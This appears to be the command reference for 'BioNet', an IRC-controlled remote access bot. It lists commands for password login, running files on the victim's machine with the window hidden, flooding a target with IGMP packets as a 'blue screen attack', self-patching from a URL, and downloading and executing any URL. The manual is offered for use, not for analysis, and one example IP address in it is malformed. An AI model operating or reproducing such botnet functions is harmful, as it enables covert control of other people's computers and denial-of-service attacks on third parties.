
If you have any suggestions on functions to add please email me
at flash.gordon@eidosnet.co.uk


Note commands are not case sensitive
the only commands available when not logged in are @BNLOGIN
, @BNHELLO and @HELP.


Command                        Description

@HELP                        - lists all commands

@BNHELLO                     - all bionet bots will respond with
                               "BioNet Server <LOCAL IP> <SERVER VERSION>"
  
@BNLOGIN <password>          - log on user allow access to bot.


@RUNVISIBLE <filename> <command line> - execute a file on the remote machine

@RUN        <filename> <command line> - execute a file on the remote machine
                                        and runs the file with the window
                                        invisible to the user

                                the password is the bionet server password

@IGMP    <target> <ammount>  - Flood the target with <ammount> IGMP packets
                               (blue screen attack) e.g @IGMP 169.432.12
                               
@PATCH   <URL>               - patch the bionet server from a url
                               e.g www.bionet.org.uk/server.exe
                          
@INSTALL <URL>               - download the URL and execute it
@ABORT                       - aborts the current function


@QUIT                        - disconnects the irc bot
@JOIN  <channel> <key>       - make the bot join a channel
@LEAVE <channel> <reason>    - leave a channel

@RAWCMD  <data>              - send a RAW data to IRC server.


